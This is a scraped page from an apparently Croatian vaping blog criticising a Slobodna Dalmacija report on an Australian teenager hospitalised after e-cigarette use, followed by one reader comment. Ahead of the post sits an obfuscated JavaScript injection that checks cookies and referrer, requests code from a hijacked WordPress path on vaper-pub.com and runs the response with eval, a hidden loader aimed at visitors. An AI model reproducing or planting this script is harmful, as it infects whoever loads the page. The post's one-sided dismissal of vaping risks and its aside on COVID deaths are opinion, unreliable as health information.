;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}
Djevojka završila u bolnici zbog pušenja električnih cigareta

Djevojka završila u bolnici zbog pušenja električnih cigareta

Djevojka završila u bolnici zbog pušenja električnih cigareta bombastični je naslov članka na portalu Slobodne Dalmacije od 14.10.2021.

Novinarski članak nekoga tko se potpisuje sa PSD, za kojeg po sadržaju članka ne bih rekao da je novinar. Na portalu Slobodne Dalmacije koji ne bi nazvao novinama nego žuta štampa, ako su im svi članci pisani ovako.

Vrhunac Hrvatskog novinarstva – navedeni članak – prepisan je sa portala Srbija Danas, koji je prepisan sa portala ABC News. Članak je skraćen sa cca 2500 riječi na cca 500. Pun krivo korištenih termina te namjerno navodi čitatelja da zaključi kako su električne cigarete generalno loše.

Da se dotični PSD samo potrudio kliknuti na ABC news portal možda bi doznao nešto više i napisao kvalitetniji članak ili bi barem doznao da cura nije Amerikanka nego iz Australije. Ali nije. Eh, srećo moja ime ti je osrednjost.

Osrednjost
Osrednjost

Na žalost većina čitatelja nema sposobnost kritičkog razmišljanja te ima stav da sve što pročita, pogotovo ako se radi o renomiranom brandu kao što je Slobodna Dalmacija, mora biti istina.

No istina je ta da oni trebaju vaš klik kako bi mogli i idući mjesec naplatiti banner emmezeti i HP-u. Taj klik je jedina svrha tog članka. Nije informiranje. Nije edukacija. Nije ništa drugo nego taj klik, i što više njih.

Dakota Stephenson, 15 g, iz Australije, završila na respiratoru možda zbog električne cigarete, ali nisu sigurni

Ovo bi možda bila jedna od mogućih verzija ispravnog naslova članka.

No ovo je mlitavo, nikoga ne interesira što se “možda” desilo. Ovakav naslov ne donosi klikove.

No da sada ne pišemo cijeli članak “kako treba” evo konkretnih zaključaka što se točno dogodilo

  1. mlada dama Dakota Stephenson, 15 godina, hospitalizirana je u Australiji nakon što se žalila na bolove u leđima i prsima
  2. doktori su zaključili da je došlo do skupljanja vode u plučima zbog čega joj je otežano disanje te su je stavili na respirator
  3. Dakota NIJE koristila THC e tekućine sa E acetatom
  4. prema tvrdnjama Dr. Alex Wodaka (direktora Australska udruga za smanjenje štete od duhana) točan uzrok navedenog stanja Dakote Stephenson nije u potpunosti jasan.
  5. Sama doktorica Eli Dabscheck koja je liječila Dakotu Stephenson kaže da nisu 100% sigurni što je uzrokovalo njezino stanje. Ovo je prvi takav zabilježeni slučaj u Australiji, sa epidemiološkog stajališta takvih slučajeva bi bilo više s obzirom na broj konzumenata e cigareta

Iskreno, sada neću dalje ulaziti u to kakav je ABC news portal, dal se radi o renomiranom portalu ili ne. Nemam vremena za to, niti je potrebno.

Niti ću ulaziti u činjenicu da je cijeli članak napisan generalno negativnim tonm prema e cigaretama.

Cijeli članka je pisan u anti vape stilu rečenicama kao što su ove:

  • privlaći se mlade osobe bojama e cigareta. Jer mi starci od 30+ koristimo isključivo crno i sivo.
  • mlade se mami e cigaretama s raznim okusima. Jer mi starci od 30+ ne volimo čokolade, voće, kolače. Jedemo samo sarmu.

Kad pročitam ovakvo nešto apsolutno gubim volju za daljnim čitanjem i gubim svaku trunku povjerenja u istinitost članka. To se zove kritičko razmišljanje o napisanoj gluposti i tvrdnji serviranoj kao “činjenicom” koja nema veze s pameti.

Ovakvi članci me previše podsjećaju na članke o Corona virusu. Znate ono kada im je nešto pogodno u tom momentu to navedu. Tipa da su osobe umrle od posljedica Corona virusa dok su u principu bile bolesne i od 100 drugih bolesti.

Pa tako i ovo.

Ako im paše navest će što god žele. Samo čekam naslove tipa “dobio srčani udar od posljedica korištenja e cigareta”. Izostavit će naravno onaj dio da je 20 godina prije toga pušio, pio, imao 200 kg i sjedio 16 sati dnevno. Ili će to biti navedeno skroz na kraju članka kao manje bitna informacija, jer tko uopće čita članke sa razumijevanjem.

Choose your Reaction!
  • Meni su ti sve gluposti,kao cigarete su zdrave pa od njih necu umrijet.Ili bilo sta sta danas unosimo u organizam.Nista vise nemozes biti siguran da je domace ili zdravo ako nisi sam to svojim rukama posadio u svom vrtu jer u ducanima je i sva hrana koju jedemo kemija a sad nas tlace sa e cigaretama kolko su stetne.Ma daj ajde,i da jesu tak me briga fino mi je bar cu umrijet sretna i mirisljava a ne u smrdljivom dimu.

Leave a Comment